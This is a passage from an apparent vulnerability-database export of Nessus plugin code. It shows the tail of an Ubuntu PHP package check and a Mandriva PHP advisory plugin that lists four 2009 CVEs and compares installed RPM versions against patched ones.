pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-cli\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-common\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-curl\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-dbg\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-dev\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-gd\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-gmp\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-ldap\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-mhash\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-mysql\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-odbc\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-pgsql\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-pspell\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-recode\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-snmp\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-sqlite\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-sybase\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-tidy\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-xsl\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php-pear\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-cgi\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-cli\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-common\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-curl\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-dbg\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-dev\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-gd\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-gmp\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-ldap\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-mhash\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-mysql\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-odbc\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-pgsql\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-pspell\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-recode\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-snmp\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-sqlite\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-sybase\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-tidy\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-xsl\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / libapache2-mod-php5filter / php-pear / php5 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:24", "description": "Some vulnerabilities were discovered and corrected in php-5.2.11 :\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and earlier,\nand 5.3.x before 5.3.1, allows context-dependent attackers to bypass\nsafe_mode restrictions, and create files in group-writable or\nworld-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers to\nbypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number of\ntemporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP before\n5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nIntermittent segfaults occured on x86_64 with the latest phpmyadmin\nand with apache (#53735).\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.", "edition": 25, "published": "2010-07-30T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2009:303)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-4017", "CVE-2009-3557"], "modified": "2010-07-30T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-fcgi", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-mhash", "p-cpe:/a:mandriva:linux:php-filepro", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-ming", "p-cpe:/a:mandriva:linux:php-ini", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-apc", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sasl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "p-cpe:/a:mandriva:linux:php-fam", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-dbase", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-idn", "p-cpe:/a:mandriva:linux:php-bz2", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-mcal", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:php-fileinfo", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php-ncurses", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-ssh2", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:php-sqlite", "p-cpe:/a:mandriva:linux:apache-mod_php", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "cpe:/o:mandriva:linux:2009.1", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-xdebug", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-eaccelerator", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-optimizer", "p-cpe:/a:mandriva:linux:php-mime_magic", "p-cpe:/a:mandriva:linux:php-dbx", "p-cpe:/a:mandriva:linux:php-apc-admin", "p-cpe:/a:mandriva:linux:php-tclink", "p-cpe:/a:mandriva:linux:php-eaccelerator-admin", "p-cpe:/a:mandriva:linux:php-vld", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-sybase", "p-cpe:/a:mandriva:linux:php-dio", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-xattr", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-suhosin", "p-cpe:/a:mandriva:linux:php-mysqli", "p-cpe:/a:mandriva:linux:php-translit", "p-cpe:/a:mandriva:linux:php-zip"], "id": "MANDRIVA_MDVSA-2009-303.NASL", "href": "https://www.tenable.com/plugins/nessus/48159", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:303. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48159);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_bugtraq_id(37079, 37138);\n script_xref(name:\"MDVSA\", value:\"2009:303\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2009:303)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Some vulnerabilities were discovered and corrected in php-5.2.11 :\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and earlier,\nand 5.3.x before 5.3.1, allows context-dependent attackers to bypass\nsafe_mode restrictions, and create files in group-writable or\nworld-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers to\nbypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number of\ntemporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP before\n5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nIntermittent segfaults occured on x86_64 with the latest phpmyadmin\nand with apache (#53735).\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://qa.mandriva.com/53735\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dbx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filepro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-idn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mime_magic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-optimizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sasl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ssh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tclink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-translit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-vld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xattr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_php-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libphp5_common5-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-apc-3.1.3p1-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-apc-admin-3.1.3p1-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-bcmath-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-bz2-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-calendar-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-cgi-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-cli-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ctype-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-curl-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dba-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dbase-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dbx-1.1.0-26.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-devel-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dio-0.0.2-3.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-dom-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-eaccelerator-0.9.5.3-8.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-eaccelerator-admin-0.9.5.3-8.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-exif-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif 